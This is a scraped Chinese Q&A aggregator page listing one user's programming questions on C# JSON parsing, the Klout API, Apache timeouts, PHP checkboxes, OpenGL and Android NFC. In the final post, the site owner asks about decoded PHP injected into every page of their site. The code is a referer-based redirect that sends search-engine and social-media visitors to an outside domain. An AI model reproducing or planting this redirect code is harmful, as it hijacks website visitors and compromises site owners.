小编req*_*nce的帖子

在C#中迭代JSON对象

我在C#中使用JSON.NET来解析来自Klout API的响应.我的回答是这样的:

[
  {
    "id": "5241585099662481339",
    "displayName": "Music",
    "name": "music",
    "slug": "music",
    "imageUrl": "http://kcdn3.klout.com/static/images/music-1333561300502.png"
  },
  {
    "id": "6953585193220490118",
    "displayName": "Celebrities",
    "name": "celebrities",
    "slug": "celebrities",
    "imageUrl": "http://kcdn3.klout.com/static/images/topics/celebrities_b32741b6703151cc7bd85fba24c44c52.png"
  },
  {
    "id": "5757029936226020304",
    "displayName": "Entertainment",
    "name": "entertainment",
    "slug": "entertainment",
    "imageUrl": "http://kcdn3.klout.com/static/images/topics/Entertainment_7002e5d2316e85a2ff004fafa017ff44.png"
  },
  {
    "id": "3718",
    "displayName": "Saturday Night Live",
    "name": "saturday night live",
    "slug": "saturday-night-live",
    "imageUrl": "http://kcdn3.klout.com/static/images/icons/generic-topic.png"
  },
  {
    "id": "8113008320053776960",
    "displayName": "Hollywood",
    "name": "hollywood",
    "slug": "hollywood",
    "imageUrl": "http://kcdn3.klout.com/static/images/topics/hollywood_9eccd1f7f83f067cb9aa2b491cd461f3.png"
  }
]
Run Code Online (Sandbox Code Playgroud)

如您所见,它包含5个id标签.也许下次它会是6或1或其他一些数字.我想迭代JSON并获取每个id标记的值.在不知道会有多少循环的情况下,我无法运行循环.我怎么解决这个问题?

c# json json.net c#-4.0

44
推荐指数
2
解决办法
11万
查看次数

向apache调度请求时出错

我在Google上有云托管,说实话它很糟糕,但我想继续使用它,我在VM上安装LAMP堆栈并将我的网站放在htdocs中.当我试图访问我的网站时它给了我 request timeout但有时它工作了5分钟左右.

当我看到apache错误日志时,它给了我这个

075: Error dispatching request to : (polling)
[Tue Oct 27 18:12:55.185819 2015] [proxy_fcgi:error] [pid 4995:tid 140183521683200] (70007)The timeout specified has expired: [client 162.158.255.169:34198] AH01075: Error dispatching request to : (polling)
[Tue Oct 27 18:12:55.487458 2015] [core:notice] [pid 2953:tid 140183785137920] AH00052: child pid 4995 exit signal Segmentation fault (11)
[Tue Oct 27 18:12:55.787973 2015] [proxy_fcgi:error] [pid 5063:tid 140183530075904] (70007)The timeout specified has expired: [client 199.27.133.137:13151] AH01075: Error dispatching request to : (polling), referer: http://whichtube.com/watch/g9-4dCeFQng/allama-nasir-abbas-jawab-ali-as-nae-talwar-kayou-na-uthai.html
[Tue Oct …
Run Code Online (Sandbox Code Playgroud)

php apache lamp proxy dispatch

12
推荐指数
3
解决办法
3万
查看次数

在DLL中为参数添加注释

我在.NET中创建了一个DLL,其中包含几个函数.现在我在另一个应用程序中起诉这个DLL 在此输入图像描述

我希望每当客户端使用我的DLL时,必须显示一些注释,显示返回类型,参数等 在此输入图像描述

我看到人们使用XML文件.有什么替代方法吗?谢谢你的温柔

.net c# xml

4
推荐指数
2
解决办法
2024
查看次数

动态创建复选框

我是php新手.我想动态创建从MySQL获取结果的复选框.如果我在员工表中有10条记录,那么它必须创建10个复选框,员工名称为value.我看过几个教程来制作数组复选框等但无法解决问题.请任何人帮助!

html php mysql sql

3
推荐指数
1
解决办法
2万
查看次数

klout api总是返回未授权

我正在用C#开发一个应用程序,当我像这样调用klout API时:

http://api.klout.com/v2/identity.json/twitter?screenName=SteveMartinToGo

它总是回归Not authorized.

我从http://klout.com/s/developers/v2获得了这个.

我甚至尝试使用API​​密钥,但这也没有用到:

http://api.klout.com/1/klout.[return_type]?key=[api_key]&users=john.

任何使用过klout API的人都可以帮助我吗?

c# c#-4.0 klout

3
推荐指数
1
解决办法
504
查看次数

如何在OpenGL中导入对象以及选择哪种文件格式?

我想创建一个机器人,并希望在OpenGL中移动它.我将在3DsMax中创建模型.我想知道在OpenGL中导入和移动它.

我应该以哪种格式将文件保存在3ds Max中,以便我可以在OpenGL中导入它?

我应该使用枢轴还是将机器人的每个部分保存为单独的文件?OpenGL是否支持枢纽?

opengl 3d 3dsmax

2
推荐指数
1
解决办法
2303
查看次数

检查Android设备上的NFC功能

这是对问题的回应

Step #1: Put this in your manifest:

<uses-feature android:name="android.hardware.nfc" android:required="false" />
Step #2: Call hasSystemFeature(PackageManager.FEATURE_NFC) on PackageManager to see if NFC is available on the current device
Run Code Online (Sandbox Code Playgroud)

我将API级别设置为8,步骤1没问题,但是当我写hasSystemFeature(PackageManager.FEATURE_NFC)它时说不Feature_NFC解析为字段,Feature_WIFI FEATURE_BLUETOOTH FEATURE_CAMERA那里是选项.我访问了Android开发者网站,但他们没有提到API级别.另一个问题是我可以在AVD上测试NFC应用吗?有人可以帮我这个谢谢

android nfc android-virtual-device android-emulator

2
推荐指数
1
解决办法
3742
查看次数

是我的代码保护

我是html的初学者.我从一个人开发了一个网站,后来当我访问mu网站的源代码时,我看到这一堆代码存在于Php tags内的每个页面中.我想问一下这是否可以保留这段代码?我甚至不知道这段代码是什么意思.

我曾经使用过这个网站http://base64decode.org/,它向我展示了我的代码是这样的

zm^r^
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://broadway.bee.pl/");
                exit();
            }
        }
    }
}
Run Code Online (Sandbox Code Playgroud)

我还想知道这是什么意思?任何帮助将不胜感激

html javascript php base64

0
推荐指数
1
解决办法
642
查看次数